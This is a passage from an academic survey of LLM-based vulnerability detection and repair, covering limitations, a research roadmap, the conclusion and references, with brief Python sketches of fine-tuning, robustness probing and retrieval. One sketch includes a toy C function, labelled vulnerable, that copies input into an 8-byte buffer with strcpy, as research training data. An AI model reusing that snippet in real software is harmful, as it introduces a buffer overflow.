In this section, we first discuss the limitations of current studies and then introduce a roadmap, illustrating the research trajectory shaped by prior work and highlighting future directions for exploration.

8.1 Limitations

Limitation 1: Small Input Granularity. Currently, LLM-based vulnerability detection and repair solutions primarily target the function level (or, more fine-grained, the line level). However, this small input granularity indicates that these approaches may not perform optimally when presented with a wider range of programs, such as classes or a whole repository. Function-level vulnerability detection approaches could overlook vulnerabilities that span multiple functions or classes [84]. Similarly, function-level vulnerability repair approaches fall short when tasked with modifications across multiple functions within the repository [128]. In addition to functions, future research could propose LLM-based detection/repair approaches capable of handling a broader range of programs.
Limitation 2: Lack of High-quality Vulnerability Datasets. One major challenge is the lack of high-quality vulnerability datasets. For vulnerability detection, previous studies [16, 19, 65] have highlighted issues with existing vulnerability data, including noisy or incorrect labels (e.g., labeling clean code as vulnerable). This data quality issue is primarily attributed to the use of automatic vulnerability collection [65], which can gather data at a scale sufficient for training DL-based models, including LLMs, but cannot ensure the complete correctness of the labels. While manually checking each data sample can ensure high quality, it is a very tedious and expensive process, especially when aiming for a large dataset. Constructing a high-quality vulnerability detection benchmark remains an open challenge to date.

For vulnerability repair, most studies either utilize synthetic data (e.g., [39]) or use real-world data without test cases (e.g., [17, 18, 28]). The reliance on synthetic data can limit the generalizability of the findings, as it may not accurately reflect the complexities and nuances of actual vulnerabilities encountered in production environments. On the other hand, real-world data without test cases makes it difficult to evaluate the effectiveness of proposed solutions comprehensively, as the absence of test cases hampers the ability to verify the correctness of the vulnerability repairs. There is an urgent need for large real-world vulnerability-fixing datasets that include test cases.

Moreover, there is a growing concern that the capabilities of LLMs may derive from the inclusion of evaluation datasets in the pre-training corpus of LLMs, a phenomenon known as data contamination [40]. To mitigate this concern, high-quality vulnerability detection/fixing benchmarks should preferably have no overlap with the pre-training corpus of LLMs.
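One simple proxy for such an overlap check is n-gram matching between benchmark samples and the pre-training corpus. The Python sketch below illustrates the idea; the n-gram size, threshold, and whitespace tokenization are illustrative assumptions on our part, not a standard procedure from [40].

    # Minimal sketch of an n-gram overlap check between a candidate
    # benchmark sample and a pre-training corpus, a simple proxy for the
    # data contamination concern discussed above. Parameters are
    # illustrative assumptions.
    def ngrams(tokens, n=13):
        return {tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1)}

    def is_contaminated(sample: str, corpus_ngrams: set,
                        n=13, threshold=0.2) -> bool:
        sample_ngrams = ngrams(sample.split(), n)
        if not sample_ngrams:
            return False
        overlap = len(sample_ngrams & corpus_ngrams) / len(sample_ngrams)
        return overlap >= threshold

    # corpus_ngrams would be precomputed once over the pre-training corpus:
    # corpus_ngrams = ngrams(corpus_text.split(), 13)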
Limitation 3: Suboptimal Performance Caused by Complexity in Vulnerability Data. Vulnerabilities can be inherently complicated, which brings challenges for their detection and repair with LLMs. For instance, inter-procedural vulnerabilities are prevalent in vulnerability data, and Li et al. [51] discovered that detecting inter-procedural vulnerabilities poses greater challenges than intra-procedural ones. Moreover, vulnerabilities encompass a wide array of Common Weakness Enumeration (CWE) types [129], but LLMs may struggle with less frequent CWE types compared to frequent types [128, 129]. In addition, vulnerabilities are typically represented in terms of code units, such as code lines, functions, or program slices within which the vulnerabilities occur. Sejfia et al. [84] observed a significant accuracy drop when detecting vulnerabilities that span multiple code units, such as spanning multiple functions. Future research should consider the complex nature of vulnerabilities when designing LLM-based solutions.

Limitation 4: Reliance on Lightweight LLMs. As highlighted in Table 2 and Table 3, most studies adapted lightweight LLMs (#parameters < 1B) for vulnerability detection and repair. For lightweight LLMs like CodeBERT, researchers have explored various strategies to boost their performance, including data-centric enhancements, model-centric innovations, integration with program analysis, combining LLMs with other deep learning methods, domain-specific pre-training, causal learning, and reinforcement learning. In some cases, such as Liu et al. [56], multiple techniques have been combined to achieve even greater performance, highlighting the versatility and potential of lightweight models. In contrast, the use of large LLMs (with over 1 billion parameters) remains relatively limited compared to lightweight LLMs, leaving a large room to explore.
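As a concrete reference point, the dominant recipe in the surveyed studies is to fine-tune a lightweight LLM such as CodeBERT with a binary classification head. The following sketch uses the Hugging Face transformers API; the toy training data and hyperparameters are illustrative assumptions, not a setup drawn from any particular study.

    # Minimal sketch of fine-tuning a lightweight LLM (CodeBERT, ~125M
    # parameters) for binary vulnerability detection. Toy data and
    # hyperparameters are illustrative only.
    import torch
    from transformers import AutoTokenizer, AutoModelForSequenceClassification

    tok = AutoTokenizer.from_pretrained("microsoft/codebert-base")
    model = AutoModelForSequenceClassification.from_pretrained(
        "microsoft/codebert-base", num_labels=2)
    optim = torch.optim.AdamW(model.parameters(), lr=2e-5)

    # Hypothetical (code, label) pairs; label 1 = vulnerable.
    train_pairs = [("int f(char *s){ char b[8]; strcpy(b, s); return 0; }", 1)]

    model.train()
    for code, label in train_pairs:
        # Truncation reflects the 512-subtoken limit discussed in Sec. 8.2.
        batch = tok(code, truncation=True, max_length=512, return_tensors="pt")
        out = model(**batch, labels=torch.tensor([label]))
        out.loss.backward()
        optim.step()
        optim.zero_grad()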
Limitation 5: Lack of Deployment Consideration. We examine two crucial aspects of deployment: 1) interaction with developers and 2) integration into developers' current workflows. Currently, none of the studies in our review have been incorporated into developers' workflows; instead, they primarily rely on static and historical data to evaluate their effectiveness. Moreover, limited studies in our review incorporate interaction with developers, such as engaging with developers through feedback or explaining the rationale behind vulnerability detection. Limited interaction between developers and LLM-based solutions may impede the establishment of trust and collaboration during practical applications. This lack of interactive features restricts the practical applicability of these models in real-world scenarios, where effective vulnerability management relies on collaboration between automated tools and developers.

To address these gaps, future research should explore more effective strategies for fostering collaboration and trust between developers and LLM-based solutions [57]. Additionally, seamlessly integrating LLM-based solutions can enable them to evolve into intelligent partners, providing enhanced support to developers.

Limitation 6: Lack of High Accuracy and Robustness. A vulnerability detection or repair solution with high accuracy is generally preferred, as it boosts developers' confidence in the reliability of detections and fixes. However, current state-of-the-art approaches [56, 128] have not yet achieved satisfactory accuracy, with 67.6% and 20% accuracy scores for vulnerability detection and repair, respectively. Moreover, the solution should maintain robustness against data perturbations or adversarial attacks to ensure its resilience. However, Yang et al. [116] and Rahman et al. [59] discovered that LLMs are not robust against data perturbations. Future research should seek ways to improve the accuracy and robustness of LLM-based solutions.
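A minimal robustness probe along these lines is a semantics-preserving perturbation such as identifier renaming: a robust detector should produce the same prediction for the original and perturbed code. The sketch below applies one fixed renaming for illustration; real attacks such as [116] search for worst-case renamings, and the detect function referenced in the comment is hypothetical.

    # Minimal sketch of a semantics-preserving perturbation (identifier
    # renaming) for probing detector robustness. String/comment handling
    # is omitted for brevity.
    import re

    def rename_identifier(code: str, old: str, new: str) -> str:
        # Word-boundary match so substrings of other names are untouched.
        return re.sub(rf"\b{re.escape(old)}\b", new, code)

    original = "int copy(char *buf) { int len = strlen(buf); return len; }"
    perturbed = rename_identifier(original, "len", "tmp0")
    # A robust detector should agree on both variants:
    # assert detect(original) == detect(perturbed)   # detect is hypothetical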
Fig. 8. Roadmap and Future Directions. (The figure contrasts well-studied options, namely line/method-level granularity, heuristic-based labels, lightweight LLMs (<1B), fine-tuning- and prompting-based adaptation, and no deployment, with under-explored ones, including class-level and repo-level granularity, datasets with test cases, manually verified and expert-annotated labels, large LLMs (>=1B), customized LLMs for vulnerability, LLM agents, interaction with developers, workflow integration, and high robustness and accuracy.)

8.2 Roadmap

Figure 8 presents the roadmap. The gray modules highlight the aspects that existing studies have primarily focused on, while the green modules represent areas that have not been extensively explored but warrant further investigation. The solid black lines represent the trajectories followed by most existing LLM-based methods for vulnerability detection and repair, while the gray dotted lines highlight relatively under-explored paths that could offer promising directions for future research in vulnerability detection and repair.

8.2.1 Established Pathways in Current Studies. As shown in both Tables 2–3 and the solid black lines in Figure 8, the existing methods typically leverage either lightweight LLMs or large LLMs adapted using techniques such as fine-tuning or prompting. The existing methods often focus on method-level or line-level analysis. The datasets used are usually collected via heuristic approaches for vulnerability detection, or consist of real-world data without test cases for vulnerability repair. Finally, these methods usually neglect deployment considerations, such as ensuring effective interaction with developers.

8.2.2 Path Forward. As shown in Figure 8, there are many promising yet under-explored modules (highlighted in green) and paths (represented by the gray dotted lines). Looking ahead, we can outline three progressively advanced stages for exploring new directions. In the first stage, researchers can study these under-explored modules individually. In the second stage, they can investigate the under-explored paths, which may include combinations of under-explored modules and well-established ones, or consist solely of multiple under-explored modules. Finally, in the third stage, by transforming all under-explored modules into well-understood components and studying various under-explored paths and combinations, researchers can summarize their findings and analyze strategies for better developing LLM-based solutions, ultimately leading to the new generation of powerful LLM-based vulnerability detection and repair solutions. Below, we describe the three stages in detail.

Stage 1: Exploring Under-explored Modules Individually. Figure 8 highlights several under-explored modules in green, each offering exciting potential for discovery. We outline below some promising opportunities for deeper investigation into these areas:

• Opportunity 1: Curating a High-quality Test Set for Vulnerability Detection. The absence of a high-quality vulnerability dataset poses a significant obstacle to vulnerability detection. While obtaining fully correct labels for a large dataset is expensive, a viable solution is to curate a high-quality test set (which is much smaller than the whole dataset) that can accurately assess progress in vulnerability detection. An easy approach for future work is to combine the manually checked vulnerability data samples scattered across several separate research works (e.g., [19, 35, 48]) to form a high-quality test set. Future works can then conduct an empirical study to recognize the real progress in vulnerability detection with the high-quality test set. Furthermore, the community can maintain a living high-quality test set by adding new manually verified data to it. This curated test set can serve as a reliable benchmark for vulnerability detection.

• Opportunity 2: Repo-level Vulnerability Detection/Repair. Current vulnerability detection and repair techniques primarily focus on the function or line level. One key reason is the input length limitation (512 subtokens) of small LLMs like CodeBERT and CodeT5, which are predominantly used in existing studies. The 512-subtoken limitation aligns well with function-level data but faces difficulty in scaling up to classes or repositories. However, the emergence of recent larger LLMs with significantly higher input length capacities, such as GPT-4 (which can handle 128k subtokens), facilitates more effective processing of repo-level data. This presents an opportunity for future research to explore repo-level vulnerability detection/repair by leveraging these larger LLMs. For this direction, one recent study [130] has initially explored the repo-level vulnerability detection task. Specifically, it compared SAST tools (e.g., CodeQL) with popular or state-of-the-art open-source LLMs (e.g., CodeLlama) for detecting software vulnerabilities in software repositories. The experimental results indicated that SAST tools achieve low vulnerability detection rates with relatively low false positives, whereas LLMs can detect more vulnerabilities but tend to suffer from high false positive rates. Alongside this initial effort, there is considerable potential and opportunity for further research in this direction.

• Opportunity 3: Customized LLMs for Vulnerability. Currently, widely used LLMs in vulnerability detection/repair are general-purpose LLMs (e.g., CodeBERT, CodeT5, and GPT-3.5) that do not fully exploit the wealth of open-source vulnerability data. A promising avenue is the development of customized LLMs tailored for vulnerability data. Some initial attempts in this direction include vulnGPT [98] and Microsoft Security Copilot [61]. However, as these solutions are proprietary, their customized LLM details may not be fully disclosed. We advocate for collaborative efforts to develop open-sourced and effective customized LLMs for vulnerability.
• Opportunity 4: Advanced LLM Usage and Adaptation. Regarding LLM usage, beyond the techniques observed in the included studies, such as fine-tuning, prompt engineering, and retrieval augmentation, there exist two more advanced usages of LLMs [62] that have not yet been explored in vulnerability detection and repair: 1) LLM agents: LLMs can serve as agents to decompose complex tasks into smaller components and employ multiple LLMs to address them [101]; 2) usage of external tools: LLMs can utilize external tools such as search engines, external databases, and other resources to enhance them [77]. Regarding detailed LLM adaptation techniques, as illustrated in Fig. 6 and Fig. 7, the majority of proposed adaptations in this field are designed for fine-tuning and prompt engineering. However, a plethora of advanced adaptation techniques for retrieval augmentation remains under-explored. These techniques include iterative retrieval augmentation [86], recursive retrieval augmentation [96], and adaptive retrieval augmentation [11]. Researchers can consider using those unexplored advanced LLM usages/adaptations in future works (see the retrieval-augmentation sketch after this list).

• Opportunity 5: Support Deployment-ready Features. Efforts could focus on enhancing LLM-based solutions with deployment-ready features, such as user interaction capabilities and seamless integration into existing developer workflows. This includes developing intuitive interfaces that allow developers to provide real-time feedback on suggestions made by the LLMs, thereby creating a more collaborative environment. Additionally, implementing functionalities that explain the reasoning behind the model's recommendations can help demystify the decision-making process, fostering trust and facilitating better adoption among developers. Moreover, integrating these solutions into popular IDEs or version control systems can streamline the workflow, making it easier for developers to utilize LLMs as part of their daily practices. By prioritizing these enhancements, LLM-based tools can significantly improve their usability and effectiveness in real-world scenarios, ultimately contributing to more robust vulnerability detection and repair processes.
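As a concrete illustration of the retrieval-augmentation direction mentioned in Opportunity 4, the sketch below retrieves the labeled examples most similar to a query function and prepends them to the detection prompt. The embedding-based knowledge base and field names are hypothetical placeholders of our own, not APIs from the cited works.

    # Minimal sketch of retrieval-augmented vulnerability detection:
    # retrieve the nearest labeled examples and build a few-shot prompt.
    # kb entries are assumed to carry precomputed 'vec', 'code', 'label'.
    import numpy as np

    def cosine(a, b):
        return float(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))

    def retrieve(query_vec, kb, k=2):
        # Rank knowledge-base entries by embedding similarity to the query.
        return sorted(kb, key=lambda e: cosine(query_vec, e["vec"]),
                      reverse=True)[:k]

    def build_prompt(code, neighbors):
        shots = "\n\n".join(
            f"Code:\n{n['code']}\nVulnerable: {n['label']}" for n in neighbors)
        return f"{shots}\n\nCode:\n{code}\nVulnerable:"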
Stage 2: Exploring Under-explored Paths. The under-explored paths (mainly represented by gray dotted lines from data to deployment) may include combinations of under-explored modules with well-established ones, or consist solely of multiple under-explored modules. This stage presents numerous opportunities. Below, we first highlight some examples of studying combinations of under-explored modules alongside well-established ones:

• Once the community develops customized LLMs, researchers can apply well-studied fine-tuning or prompting-based adaptation techniques to improve function-level or line-level vulnerability detection or repair. These enhanced models can further be extended to support developer interaction, creating more practical and integrated solutions.

• Once new datasets are established, such as those containing manually verified vulnerabilities and associated test cases, researchers can re-evaluate existing LLM methods to assess their effectiveness in vulnerability detection and repair. Exploring various combinations of under-explored aspects and well-studied approaches can yield valuable insights and advancements.

• Researchers can leverage general-purpose LLMs (e.g., CodeBERT, CodeT5, and GPT-3.5) to develop repo-level vulnerability detection and repair tools, also facilitating interaction with developers.

There are also many opportunities in paths that consist solely of multiple under-explored modules. For instance, researchers could design a repo-level vulnerability detection or repair method using customized vulnerability-specific LLMs and enhance its effectiveness by incorporating LLM agent techniques. Finally, the tool can be integrated into IDEs, leveraging LLMs to improve interaction capabilities.

Stage 3: Summarizing Findings and Applying Them for Next-Generation LLM-based Solutions. In this most advanced stage, researchers are expected to transform various under-explored aspects into well-studied areas and investigate diverse under-explored paths. At this stage, they can summarize their findings and analyze strategies for improving the development of LLM-based solutions. By leveraging this experience and knowledge, they may push the boundaries of what LLMs can achieve in vulnerability detection and repair to new heights.

Ideally, by 2030, following the roadmap illustrated in Figure 8, the community can develop a highly effective method capable of performing line-level, method-level, class-level, and repository-level vulnerability detection and repair, utilizing an expert-annotated benchmark to ensure accurate evaluation. Furthermore, the ideal solution should facilitate seamless communication and collaboration with developers, achieving high accuracy and robustness while providing trustworthy, expert-level insights into real-world vulnerabilities.
9 THREATS TO VALIDITY

The potential threat to validity is the risk of inadvertently excluding relevant studies during the literature search and selection phase. Incomplete summarization of keywords for vulnerability detection/repair or varied terminologies for LLMs may have caused relevant research studies to be missed in our review. To mitigate this risk, we initially performed a manual selection of 17 high-impact venues and extracted a relatively comprehensive set of standard keywords from relevant papers within these venues. In addition, we further augmented our search results by combining automated search with forward-backward snowballing.

10 CONCLUSION AND FUTURE WORK

The use of Large Language Models (LLMs) for vulnerability detection and repair has been garnering increasing attention. This paper presents a systematic literature review of 58 primary studies on LLMs for vulnerability detection and repair. This review begins by analyzing the types of LLMs used in primary studies, shedding light on researchers' preferences for different LLMs. Subsequently, we categorized a variety of techniques for adapting LLMs. Through our analysis, this review also identifies the limitations in this field and proposes a research roadmap outlining promising avenues for future exploration. In the future, we plan to broaden this literature review by incorporating additional vulnerability-related tasks, such as vulnerability localization and vulnerability assessment.

Acknowledgement. This research/project is supported by the National Research Foundation, under its Investigatorship Grant (NRF-NRFI08-2022-0002). Any opinions, findings and conclusions or recommendations expressed in this material are those of the author(s) and do not reflect the views of National Research Foundation, Singapore.

REFERENCES
[1] ACM Digital Library. https://dl.acm.org.
[2] arXiv Database. https://arxiv.org.
[3] IEEE Xplore Database. https://ieeexplore.ieee.org.
[4] ScienceDirect Database. https://www.sciencedirect.com.
[5] SpringerLink Database. https://link.springer.com.
[6] Web of Science Database. https://www.webofscience.com.
[7] Wiley Database. https://onlinelibrary.wiley.com.
[8] Online Appendix for This Review. https://docs.google.com/document/d/18-UrkfH35CNMGRjjsDYZGK6L1aC9wP3GsKCtrIekcUQ/edit?usp=sharing, 2024.
[9] Ahmad, B., Thakur, S., Tan, B., Karri, R., and Pearce, H. Fixing hardware security bugs with large language models. CoRR abs/2302.01215 (2023).
[10] Ahmad, W. U., Chakraborty, S., Ray, B., and Chang, K.-W. Unified pre-training for program understanding and generation. arXiv preprint arXiv:2103.06333 (2021).
[11] Asai, A., Wu, Z., Wang, Y., Sil, A., and Hajishirzi, H. Self-RAG: Learning to retrieve, generate, and critique through self-reflection. arXiv preprint arXiv:2310.11511 (2023).
[12] Berabi, B., Gronskiy, A., Raychev, V., Sivanrupan, G., Chibotaru, V., and Vechev, M. T. DeepCode AI Fix: Fixing security vulnerabilities with large language models. CoRR abs/2402.13291 (2024).
[13] Brown, T., Mann, B., Ryder, N., Subbiah, M., Kaplan, J. D., Dhariwal, P., Neelakantan, A., Shyam, P., Sastry, G., Askell, A., et al. Language models are few-shot learners. Advances in Neural Information Processing Systems 33 (2020), 1877–1901.
[14] Chakraborty, S., Ahmed, T., Ding, Y., Devanbu, P. T., and Ray, B. NatGen: generative pre-training by "naturalizing" source code. In Proceedings of the 30th ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering, ESEC/FSE 2022, Singapore, Singapore, November 14-18, 2022 (2022), A. Roychoudhury, C. Cadar, and M. Kim, Eds., ACM, pp. 18–30.
[15] Chen, M., Tworek, J., Jun, H., Yuan, Q., Pinto, H. P. d. O., Kaplan, J., Edwards, H., Burda, Y., Joseph, N., Brockman, G., et al. Evaluating large language models trained on code. arXiv preprint arXiv:2107.03374 (2021).
[16] Chen, Y., Ding, Z., Alowain, L., Chen, X., and Wagner, D. A. DiverseVul: A new vulnerable source code dataset for deep learning based vulnerability detection. In Proceedings of the 26th International Symposium on Research in Attacks, Intrusions and Defenses, RAID 2023, Hong Kong, China, October 16-18, 2023 (2023), ACM, pp. 654–668.
[17] Chen, Z., Kommrusch, S., and Monperrus, M. Neural transfer learning for repairing security vulnerabilities in C code. IEEE Trans. Software Eng. 49, 1 (2023), 147–165.
[18] Chi, J., Qu, Y., Liu, T., Zheng, Q., and Yin, H. SeqTrans: Automatic vulnerability fix via sequence to sequence learning. IEEE Trans. Software Eng. 49, 2 (2023), 564–585.
[19] Croft, R., Babar, M. A., and Kholoosi, M. M. Data quality for software vulnerability datasets. In 45th IEEE/ACM International Conference on Software Engineering, ICSE 2023, Melbourne, Australia, May 14-20, 2023 (2023), IEEE, pp. 121–133.
[20] Devlin, J., Chang, M.-W., Lee, K., and Toutanova, K. BERT: Pre-training of deep bidirectional transformers for language understanding. arXiv preprint arXiv:1810.04805 (2018).
[21] Ding, Y., Fu, Y., Ibrahim, O., Sitawarin, C., Chen, X., Alomair, B., Wagner, D. A., Ray, B., and Chen, Y. Vulnerability detection with code language models: How far are we? arXiv preprint arXiv:2403.18624 (2024).
[22] Du, X., Zheng, G., Wang, K., Feng, J., Deng, W., Liu, M., Chen, B., Peng, X., Ma, T., and Lou, Y. Vul-RAG: Enhancing LLM-based vulnerability detection via knowledge-level RAG. CoRR abs/2406.11147 (2024).
[23] Feng, Z., Guo, D., Tang, D., Duan, N., Feng, X., Gong, M., Shou, L., Qin, B., Liu, T., Jiang, D., et al. CodeBERT: A pre-trained model for programming and natural languages. arXiv preprint arXiv:2002.08155 (2020).
[24] Fried, D., Aghajanyan, A., Lin, J., Wang, S., Wallace, E., Shi, F., Zhong, R., Yih, S., Zettlemoyer, L., and Lewis, M. InCoder: A generative model for code infilling and synthesis. In The Eleventh International Conference on Learning Representations, ICLR 2023, Kigali, Rwanda, May 1-5, 2023 (2023), OpenReview.net.
[25] Fu, M., Nguyen, V., Tantithamthavorn, C., Phung, D., and Le, T. Vision transformer-inspired automated vulnerability repair. ACM Transactions on Software Engineering and Methodology (2024).
[26] Fu, M., and Tantithamthavorn, C. LineVul: A transformer-based line-level vulnerability prediction. In 19th IEEE/ACM International Conference on Mining Software Repositories, MSR 2022, Pittsburgh, PA, USA, May 23-24, 2022 (2022), ACM, pp. 608–620.
[27] Fu, M., Tantithamthavorn, C., Le, T., Kume, Y., Nguyen, V., Phung, D. Q., and Grundy, J. C. AIBugHunter: A practical tool for predicting, classifying and repairing software vulnerabilities. Empir. Softw. Eng. 29, 1 (2024), 4.
[28] Fu, M., Tantithamthavorn, C., Le, T., Nguyen, V., and Phung, D. Q. VulRepair: a T5-based automated software vulnerability repair. In Proceedings of the 30th ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering, ESEC/FSE 2022, Singapore, Singapore, November 14-18, 2022 (2022), A. Roychoudhury, C. Cadar, and M. Kim, Eds., ACM, pp. 935–947.
[29] Fu, M., Tantithamthavorn, C., Nguyen, V., and Le, T. ChatGPT for vulnerability detection, classification, and repair: How far are we? APSEC (2023).
[30] Ghaffarian, S. M., and Shahriari, H. R. Software vulnerability analysis and discovery using machine-learning and data-mining techniques: A survey. ACM Computing Surveys (CSUR) 50, 4 (2017), 1–36.
[31] GitHub. GitHub Copilot. https://copilot.github.com, 2023.
[32] Guo, D., Lu, S., Duan, N., Wang, Y., Zhou, M., and Yin, J. UniXcoder: Unified cross-modal pre-training for code representation. In Proceedings of the 60th Annual Meeting of the Association for Computational Linguistics (ACL) (2022), Association for Computational Linguistics, pp. 7212–7225.
[33] Guo, D., Ren, S., Lu, S., Feng, Z., Tang, D., Liu, S., Zhou, L., Duan, N., Svyatkovskiy, A., Fu, S., et al. GraphCodeBERT: Pre-training code representations with data flow. arXiv preprint arXiv:2009.08366 (2020).
[34] Hanif, H., and Maffeis, S. VulBERTa: Simplified source code pre-training for vulnerability detection. In International Joint Conference on Neural Networks, IJCNN 2022, Padua, Italy, July 18-23, 2022 (2022), IEEE, pp. 1–8.
[35] He, J., and Vechev, M. Large language models for code: Security hardening and adversarial testing. In Proceedings of the 2023 ACM SIGSAC Conference on Computer and Communications Security (2023), pp. 1865–1879.
[36] He, J., Zhou, X., Xu, B., Zhang, T., Kim, K., Yang, Z., Thung, F., Irsan, I. C., and Lo, D. Representation learning for Stack Overflow posts: How far are we? ACM Transactions on Software Engineering and Methodology (2023).
[37] Hou, X., Zhao, Y., Liu, Y., Yang, Z., Wang, K., Li, L., Luo, X., Lo, D., Grundy, J. C., and Wang, H. Large language models for software engineering: A systematic literature review. ArXiv abs/2308.10620 (2023).
[38] Islam, N. T., Khoury, J., Seong, A., Parra, G. D. L. T., Bou-Harb, E., and Najafirad, P. LLM-powered code vulnerability repair with reinforcement learning and semantic reward. CoRR abs/2401.03374 (2024).
[39] Islam, N. T., and Najafirad, P. Code security vulnerability repair using reinforcement learning with large language models. AAAI Workshop (2024).
[40] Jiang, M., Liu, K. Z., Zhong, M., Schaeffer, R., Ouyang, S., Han, J., and Koyejo, S. Investigating data contamination for pre-training language models, 2024.
[41] Jiang, Z., Sun, W., Gu, X., Wu, J., Wen, T., Hu, H., and Yan, M. DFEPT: data flow embedding for enhancing pre-trained model based vulnerability detection. In Proceedings of the 15th Asia-Pacific Symposium on Internetware, Internetware 2024, Macau, SAR, China, July 24-26, 2024 (2024), H. Mei, J. Lv, A. Helal, X. Ma, S. Cheung, J. Zhang, and T. Zhang, Eds., ACM.
[42] Kanade, A., Maniatis, P., Balakrishnan, G., and Shi, K. Learning and evaluating contextual embedding of source code. In International Conference on Machine Learning (2019).
[43] Khare, A., Dutta, S., Li, Z., Solko-Breslin, A., Alur, R., and Naik, M. Understanding the effectiveness of large language models in detecting security vulnerabilities. arXiv preprint arXiv:2311.16169 (2023).
[44] Kojima, T., Gu, S. S., Reid, M., Matsuo, Y., and Iwasawa, Y. Large language models are zero-shot reasoners. In Advances in Neural Information Processing Systems 35: Annual Conference on Neural Information Processing Systems 2022, NeurIPS 2022, New Orleans, LA, USA, November 28 - December 9, 2022 (2022), S. Koyejo, S. Mohamed, A. Agarwal, D. Belgrave, K. Cho, and A. Oh, Eds.
[45] Kuang, H., Yang, F., Zhang, L., Tang, G., and Yang, L. Leveraging user-defined identifiers for counterfactual data generation in source code vulnerability detection. In 23rd IEEE International Working Conference on Source Code Analysis and Manipulation, SCAM 2023, Bogotá, Colombia, October 2-3, 2023 (2023), L. Moonen, C. D. Newman, and A. Gorla, Eds., IEEE, pp. 143–150.
[46] Le, T. H. M., Du, X., and Babar, M. A. Are latent vulnerabilities hidden gems for software vulnerability prediction? An empirical study. In 21st IEEE/ACM International Conference on Mining Software Repositories, MSR 2024, Lisbon, Portugal, April 15-16, 2024 (2024), D. Spinellis, A. Bacchelli, and E. Constantinou, Eds., ACM, pp. 716–727.
[47] Lewis, P. S. H., Perez, E., Piktus, A., Petroni, F., Karpukhin, V., Goyal, N., Küttler, H., Lewis, M., Yih, W., Rocktäschel, T., Riedel, S., and Kiela, D. Retrieval-augmented generation for knowledge-intensive NLP tasks. In Advances in Neural Information Processing Systems 33: Annual Conference on Neural Information Processing Systems 2020, NeurIPS 2020, December 6-12, 2020, virtual (2020), H. Larochelle, M. Ranzato, R. Hadsell, M. Balcan, and H. Lin, Eds.
[48] Li, K., Chen, S., Fan, L., Feng, R., Liu, H., Liu, C., Liu, Y., and Chen, Y. Comparison and evaluation on static application security testing (SAST) tools for Java. In Proceedings of the 31st ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering (2023), pp. 921–933.
[49] Li, R., Allal, L. B., Zi, Y., Muennighoff, N., Kocetkov, D., Mou, C., Marone, M., Akiki, C., Li, J., Chim, J., Liu, Q., Zheltonozhskii, E., Zhuo, T. Y., Wang, T., Dehaene, O., Davaadorj, M., Lamy-Poirier, J., Monteiro, J., Shliazhko, O., Gontier, N., Meade, N., Zebaze, A., Yee, M.-H., Umapathi, L. K., Zhu, J., Lipkin, B., Oblokulov, M., Wang, Z., Murthy, R., Stillerman, J., Patel, S. S., Abulkhanov, D., Zocca, M., Dey, M., Zhang, Z., Fahmy, N., Bhattacharyya, U., Yu, W., Singh, S., Luccioni, S., Villegas, P., Kunakov, M., Zhdanov, F., Romero, M., Lee, T., Timor, N., Ding, J., Schlesinger, C., Schoelkopf, H., Ebert, J., Dao, T., Mishra, M., Gu, A., Robinson, J., Anderson, C. J., Dolan-Gavitt, B., Contractor, D., Reddy, S., Fried, D., Bahdanau, D., Jernite, Y., Ferrandis, C. M., Hughes, S. M., Wolf, T., Guha, A., von Werra, L., and de Vries, H. StarCoder: may the source be with you! ArXiv abs/2305.06161 (2023).
[50] Li, Z., Wang, N., Zou, D., Li, Y., Zhang, R., Xu, S., Zhang, C., and Jin, H. On the effectiveness of function-level vulnerability detectors for inter-procedural vulnerabilities. In Proceedings of the 46th IEEE/ACM International Conference on Software Engineering, ICSE 2024, Lisbon, Portugal, April 14-20, 2024 (2024), ACM, pp. 157:1–157:12.
[51] Li, Z., Wang, N., Zou, D., Li, Y., Zhang, R., Xu, S., Zhang, C., and Jin, H. On the effectiveness of function-level vulnerability detectors for inter-procedural vulnerabilities. ICSE (2024).
[52] Liang, J. T., Yang, C., and Myers, B. A. A large-scale survey on the usability of AI programming assistants: Successes and challenges. In Proceedings of the 46th IEEE/ACM International Conference on Software Engineering, ICSE 2024, Lisbon, Portugal, April 14-20, 2024 (2024), ACM, pp. 52:1–52:13.
[53] Lin, G., Wen, S., Han, Q.-L., Zhang, J., and Xiang, Y. Software vulnerability detection using deep neural networks: a survey. Proceedings of the IEEE 108, 10 (2020), 1825–1848.
[54] Liu, Y., Ott, M., Goyal, N., Du, J., Joshi, M., Chen, D., Levy, O., Lewis, M., Zettlemoyer, L., and Stoyanov, V. RoBERTa: A robustly optimized BERT pretraining approach. arXiv preprint arXiv:1907.11692 (2019).
[55] Liu, Z., Liao, Q., Gu, W., and Gao, C. Software vulnerability detection with GPT and in-context learning. In 8th International Conference on Data Science in Cyberspace, DSC 2023, Hefei, China, August 18-20, 2023 (2023), IEEE, pp. 229–236.
[56] Liu, Z., Tang, Z., Zhang, J., Xia, X., and Yang, X. Pre-training by predicting program dependencies for vulnerability analysis tasks. ICSE (2024).
[57] Lo, D. Trustworthy and synergistic artificial intelligence for software engineering: Vision and roadmaps. CoRR abs/2309.04142 (2023).
[58] Lu,S.,Guo,D.,Ren,S.,Huang,J.,Svyatkovskiy,A.,Blanco,A.,Clement,C.,Drain,D.,Jiang,D.,Tang,D., etal.Codexglue:Amachinelearningbenchmarkdatasetforcodeunderstandingandgeneration.arXivpreprint arXiv:2102.04664(2021). [59] MahbuburRahman,M.,Ceka,I.,Mao,C.,Chakraborty,S.,Ray,B.,andLe,W.Towardscausaldeeplearningfor vulnerabilitydetection.ICSE(2024). [60] Meta.Codellama:Openfoundationmodelsforcode.https://ai.meta.com/research/publications/code-llama-open- foundation-models-for-code/,2023.
[61] Microsoft. Microsoft Copilot for Security. https://microsoft.github.io/PartnerResources/skilling/microsoft-security-academy/microsoft-security-copilot, 2024.
[62] Minaee, S., Mikolov, T., Nikzad, N., Chenaghlu, M., Socher, R., Amatriain, X., and Gao, J. Large language models: A survey, 2024.
[63] Ni, C., Shen, L., Xu, X., Yin, X., and Wang, S. Learning-based models for vulnerability detection: An extensive study. arXiv preprint arXiv:2408.07526 (2024).
[64] Ni, C., Yin, X., Yang, K., Zhao, D., Xing, Z., and Xia, X. Distinguishing look-alike innocent and vulnerable code by subtle semantic representation learning and explanation. In Proceedings of the 31st ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering (2023), pp. 1611–1622.
